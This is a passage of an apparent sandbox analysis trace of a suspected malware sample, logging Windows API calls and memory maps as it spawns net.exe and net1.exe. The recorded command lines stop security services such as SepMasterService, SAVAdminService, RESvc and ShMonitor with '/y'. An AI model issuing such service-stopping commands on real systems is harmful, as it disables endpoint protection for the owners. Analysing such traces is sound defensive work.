_String2="SAVADMINSERVICE") returned 4 [0109.379] _wcsicmp (_String1="wksta", _String2="SAVADMINSERVICE") returned 4 [0109.379] _wcsicmp (_String1="prdr", _String2="SAVADMINSERVICE") returned -3 [0109.379] _wcsicmp (_String1="devrdr", _String2="SAVADMINSERVICE") returned -15 [0109.379] _wcsicmp (_String1="lanmanworkstation", _String2="SAVADMINSERVICE") returned -7 [0109.379] _wcsicmp (_String1="server", _String2="SAVADMINSERVICE") returned 4 [0109.379] _wcsicmp (_String1="svr", _String2="SAVADMINSERVICE") returned 21 [0109.379] _wcsicmp (_String1="srv", _String2="SAVADMINSERVICE") returned 17 [0109.379] _wcsicmp (_String1="lanmanserver", _String2="SAVADMINSERVICE") returned -7 [0109.379] _wcsicmp (_String1="alerter", _String2="SAVADMINSERVICE") returned -18 [0109.379] _wcsicmp (_String1="netlogon", _String2="SAVADMINSERVICE") returned -5 [0109.379] NetServiceControl (in: servername=0x0, service="SAVADMINSERVICE", opcode=0x0, arg=0x0, bufptr=0x10fab0 | out: bufptr=0x10fab0) returned 0x889 [0109.380] wcscpy_s (in: _Destination=0xff4a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.380] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0109.381] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0109.382] GetFileType (hFile=0xb) returned 0x2 [0109.382] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0109.383] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x10f970*=0x1e) returned 1 [0109.383] GetFileType (hFile=0xb) returned 0x2 [0109.383] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0109.383] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x10f970*=0x2) returned 1 [0109.384] _ultow (in: _Dest=0x889, _Radix=1112544 | out: _Dest=0x889) returned="2185" [0109.384] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0109.384] GetFileType (hFile=0xb) returned 0x2 [0109.384] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0109.384] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x10f970*=0x34) returned 1 [0109.385] GetFileType (hFile=0xb) returned 0x2 [0109.385] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f978 | out: lpMode=0x10f978) returned 1 [0109.385] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f970, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x10f970*=0x2) returned 1 [0109.386] NetApiBufferFree (Buffer=0x204d50) returned 0x0 [0109.386] NetApiBufferFree (Buffer=0x20c100) returned 0x0 [0109.386] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVAdminService /y" [0109.386] exit (_Code=2) Process: id = "255" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x519d2000" os_pid = "0xe3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "243" os_parent_pid = "0xc98" cmd_line = "C:\\Windows\\system32\\net1 stop RESvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9556 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9557 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9558 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9559 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 9560 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9561 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9562 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9563 start_va = 0xff480000 end_va = 0xff4b2fff entry_point = 0xff480000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9564 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9565 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9566 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 9567 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9568 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 9569 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9570 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9640 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9641 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9642 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9643 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 9644 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 9645 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9646 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9647 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9648 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9649 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9650 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9651 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9652 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9653 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9654 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9655 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9656 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9657 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9658 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9659 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9660 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9661 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9662 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9664 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 732 os_tid = 0xe7c [0109.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fc90 | out: lpSystemTimeAsFileTime=0x14fc90*(dwLowDateTime=0xf6457e50, dwHighDateTime=0x1d48689)) [0109.260] GetCurrentProcessId () returned 0xe3c [0109.260] GetCurrentThreadId () returned 0xe7c [0109.260] GetTickCount () returned 0x2508f [0109.260] QueryPerformanceCounter (in: lpPerformanceCount=0x14fc98 | out: lpPerformanceCount=0x14fc98*=1815617800000) returned 1 [0109.261] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0109.261] __set_app_type (_Type=0x1) [0109.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff499c9c) returned 0x0 [0109.261] __getmainargs (in: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788, _DoWildCard=0, _StartInfo=0xff4a479c | out: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788) returned 0 [0109.262] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.262] GetConsoleOutputCP () returned 0x1b5 [0109.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4acec0 | out: lpCPInfo=0xff4acec0) returned 1 [0109.265] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.283] sprintf_s (in: _DstBuf=0x14fc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.283] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.285] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.285] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RESvc /y" [0109.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.285] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.285] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fc28 | out: Buffer=0x14fc28*=0x244d40) returned 0x0 [0109.285] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fc28 | out: Buffer=0x14fc28*=0x24c0e0) returned 0x0 [0109.285] _fileno (_File=0x7fefdba2a80) returned 0 [0109.286] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.286] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.286] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.286] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.286] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.286] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.286] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.286] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.286] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.286] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.286] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.286] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.286] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.286] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.286] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.286] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.286] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.286] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.286] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.286] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.286] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.286] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.287] _wcsicmp (_String1="accounts", _String2="RESvc") returned -17 [0109.287] _wcsicmp (_String1="computer", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="config", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="continue", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="cont", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="file", _String2="RESvc") returned -12 [0109.287] _wcsicmp (_String1="files", _String2="RESvc") returned -12 [0109.287] _wcsicmp (_String1="group", _String2="RESvc") returned -11 [0109.287] _wcsicmp (_String1="groups", _String2="RESvc") returned -11 [0109.287] _wcsicmp (_String1="help", _String2="RESvc") returned -10 [0109.287] _wcsicmp (_String1="helpmsg", _String2="RESvc") returned -10 [0109.287] _wcsicmp (_String1="localgroup", _String2="RESvc") returned -6 [0109.287] _wcsicmp (_String1="pause", _String2="RESvc") returned -2 [0109.287] _wcsicmp (_String1="session", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="sessions", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="sess", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="share", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="start", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="stats", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="statistics", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="stop", _String2="RESvc") returned 1 [0109.287] _wcsicmp (_String1="time", _String2="RESvc") returned 2 [0109.287] _wcsicmp (_String1="user", _String2="RESvc") returned 3 [0109.287] _wcsicmp (_String1="users", _String2="RESvc") returned 3 [0109.287] _wcsicmp (_String1="msg", _String2="RESvc") returned -5 [0109.287] _wcsicmp (_String1="messenger", _String2="RESvc") returned -5 [0109.287] _wcsicmp (_String1="receiver", _String2="RESvc") returned -16 [0109.287] _wcsicmp (_String1="rcv", _String2="RESvc") returned -2 [0109.287] _wcsicmp (_String1="netpopup", _String2="RESvc") returned -4 [0109.287] _wcsicmp (_String1="redirector", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="redir", _String2="RESvc") returned -15 [0109.287] _wcsicmp (_String1="rdr", _String2="RESvc") returned -1 [0109.287] _wcsicmp (_String1="workstation", _String2="RESvc") returned 5 [0109.288] _wcsicmp (_String1="work", _String2="RESvc") returned 5 [0109.288] _wcsicmp (_String1="wksta", _String2="RESvc") returned 5 [0109.288] _wcsicmp (_String1="prdr", _String2="RESvc") returned -2 [0109.288] _wcsicmp (_String1="devrdr", _String2="RESvc") returned -14 [0109.288] _wcsicmp (_String1="lanmanworkstation", _String2="RESvc") returned -6 [0109.288] _wcsicmp (_String1="server", _String2="RESvc") returned 1 [0109.288] _wcsicmp (_String1="svr", _String2="RESvc") returned 1 [0109.288] _wcsicmp (_String1="srv", _String2="RESvc") returned 1 [0109.288] _wcsicmp (_String1="lanmanserver", _String2="RESvc") returned -6 [0109.288] _wcsicmp (_String1="alerter", _String2="RESvc") returned -17 [0109.288] _wcsicmp (_String1="netlogon", _String2="RESvc") returned -4 [0109.288] _wcsupr (in: _String="RESvc" | out: _String="RESVC") returned="RESVC" [0109.288] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x24c900 [0109.294] GetServiceKeyNameW (in: hSCManager=0x24c900, lpDisplayName="RESVC", lpServiceName=0xff4a5750, lpcchBuffer=0x14fb48 | out: lpServiceName="", lpcchBuffer=0x14fb48) returned 0 [0109.296] _wcsicmp (_String1="msg", _String2="RESVC") returned -5 [0109.296] _wcsicmp (_String1="messenger", _String2="RESVC") returned -5 [0109.296] _wcsicmp (_String1="receiver", _String2="RESVC") returned -16 [0109.296] _wcsicmp (_String1="rcv", _String2="RESVC") returned -2 [0109.296] _wcsicmp (_String1="redirector", _String2="RESVC") returned -15 [0109.296] _wcsicmp (_String1="redir", _String2="RESVC") returned -15 [0109.296] _wcsicmp (_String1="rdr", _String2="RESVC") returned -1 [0109.296] _wcsicmp (_String1="workstation", _String2="RESVC") returned 5 [0109.296] _wcsicmp (_String1="work", _String2="RESVC") returned 5 [0109.296] _wcsicmp (_String1="wksta", _String2="RESVC") returned 5 [0109.296] _wcsicmp (_String1="prdr", _String2="RESVC") returned -2 [0109.296] _wcsicmp (_String1="devrdr", _String2="RESVC") returned -14 [0109.296] _wcsicmp (_String1="lanmanworkstation", _String2="RESVC") returned -6 [0109.296] _wcsicmp (_String1="server", _String2="RESVC") returned 1 [0109.296] _wcsicmp (_String1="svr", _String2="RESVC") returned 1 [0109.296] _wcsicmp (_String1="srv", _String2="RESVC") returned 1 [0109.296] _wcsicmp (_String1="lanmanserver", _String2="RESVC") returned -6 [0109.296] _wcsicmp (_String1="alerter", _String2="RESVC") returned -17 [0109.296] _wcsicmp (_String1="netlogon", _String2="RESVC") returned -4 [0109.296] NetServiceControl (in: servername=0x0, service="RESVC", opcode=0x0, arg=0x0, bufptr=0x14fb50 | out: bufptr=0x14fb50) returned 0x889 [0109.300] wcscpy_s (in: _Destination=0xff4a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.300] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0109.301] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0109.302] GetFileType (hFile=0xb) returned 0x2 [0109.303] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fa18 | out: lpMode=0x14fa18) returned 1 [0109.303] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14fa10, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x14fa10*=0x1e) returned 1 [0109.304] GetFileType (hFile=0xb) returned 0x2 [0109.304] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fa18 | out: lpMode=0x14fa18) returned 1 [0109.305] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14fa10, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x14fa10*=0x2) returned 1 [0109.305] _ultow (in: _Dest=0x889, _Radix=1374848 | out: _Dest=0x889) returned="2185" [0109.305] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0109.306] GetFileType (hFile=0xb) returned 0x2 [0109.306] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fa18 | out: lpMode=0x14fa18) returned 1 [0109.307] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14fa10, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x14fa10*=0x34) returned 1 [0109.307] GetFileType (hFile=0xb) returned 0x2 [0109.308] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fa18 | out: lpMode=0x14fa18) returned 1 [0109.308] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14fa10, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x14fa10*=0x2) returned 1 [0109.313] NetApiBufferFree (Buffer=0x244d40) returned 0x0 [0109.313] NetApiBufferFree (Buffer=0x24c0e0) returned 0x0 [0109.313] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RESvc /y" [0109.313] exit (_Code=2) Process: id = "256" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x63aa0000" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SepMasterService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9667 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9668 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9669 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 9670 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9671 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9672 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9673 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9674 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9675 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9676 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9677 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9678 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9679 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9680 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9681 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 733 os_tid = 0x1380 Process: id = "257" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x63bbf000" os_pid = "0xf84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ShMonitor /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9684 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9685 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9686 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9687 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9688 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = 